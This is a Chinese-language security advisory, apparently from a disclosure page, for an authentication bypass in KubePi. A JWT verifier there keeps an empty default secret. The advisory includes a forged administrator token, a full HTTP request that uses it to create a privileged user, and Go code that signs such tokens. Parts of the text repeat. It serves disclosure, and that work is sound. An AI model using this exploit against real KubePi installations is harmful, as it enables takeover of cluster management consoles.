kubepi jwttoken 校验存在缺陷,默认配置文件中jwt密钥为空,虽然读取配置文件相关逻辑中检测到密钥为空时,会生成一个随机32位字符串覆盖配置文件中的密钥,但是实际校验时,密钥为空,使用空密钥生成jwttoken可绕过登录校验,可直接接管后台
2.使用空密钥生成jwttoken eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4
POST /kubepi/api/v1/users HTTP/1.1
Host: 127.0.0.1:9982
Content-Length: 248
sec-ch-ua:
Accept: application/json, text/plain, */*
lang: zh-CN
Content-Type: application/json
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://127.0.0.1:9982
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:9982/kubepi/user-management/users/create
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4
Connection: close
{"apiVersion":"v1","kind":"User","name":"tang","roles":["Common User","Manage Image Registries","Manage Clusters","Manage RBAC"],"nickName":"tang","email":"[email protected]","authenticate":{"password":"12345678@Tang"},"mfa":{"enable":false,"secret":""}}
package main
import (
"fmt"
"github.com/kataras/iris/v12/middleware/jwt"
"time"
)
var jwtMaxAge = 100000 * time.Minute
type UserProfile struct {
Name string `json:"name"`
NickName string `json:"nickName"`
Email string `json:"email"`
Language string `json:"language"`
ResourcePermissions map[string][]string `json:"resourcePermissions"`
IsAdministrator bool `json:"isAdministrator"`
Mfa Mfa `json:"mfa"`
}
type Mfa struct {
Enable bool `json:"enable"`
Secret string `json:"secret"`
Approved bool `json:"approved"`
}
func main() {
jwtSigner := jwt.NewSigner(jwt.HS256, "", jwtMaxAge)
test := map[string][]string{}
profile := UserProfile{
Name: "admin",
NickName: "Administrator",
Email: "[email protected]",
Language: "zh-CN",
ResourcePermissions: test,
IsAdministrator: true,
Mfa: Mfa{
Secret: "",
Enable: false,
Approved: false,
},
}
nonejwt, _ := jwtSigner.Sign(profile)
fmt.Println(string(nonejwt))
}
其实主要问题就是虽然有检测到配置文件中key为空时会生成一个32位的随机字符串覆盖配置文件中的key,但是实际上jwt.NewVerifier时并未使用这个生成的key,而是使用最开始默认配置文件中读取到的空字符串key作为jwtkey了。存在逻辑缺陷。服务重启后虽然会按照写入了随机的32为key的配置文件启动,但是未重启过服务的都是空字符串key。
Summary
kubepi jwttoken 校验存在缺陷,默认配置文件中jwt密钥为空,虽然读取配置文件相关逻辑中检测到密钥为空时,会生成一个随机32位字符串覆盖配置文件中的密钥,但是实际校验时,密钥为空,使用空密钥生成jwttoken可绕过登录校验,可直接接管后台
Details
1.搭建最新版kubepi
sudo docker run --privileged -d --restart=unless-stopped -p 9982:80 1panel/kubepi
2.使用空密钥生成jwttoken eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4
3.使用生成的密钥创建用户tang
4.使用创建的用户tang正常登录后台
PoC
补充说明
其实主要问题就是虽然有检测到配置文件中key为空时会生成一个32位的随机字符串覆盖配置文件中的key,但是实际上jwt.NewVerifier时并未使用这个生成的key,而是使用最开始默认配置文件中读取到的空字符串key作为jwtkey了。存在逻辑缺陷。服务重启后虽然会按照写入了随机的32为key的配置文件启动,但是未重启过服务的都是空字符串key。
Impact
校验不当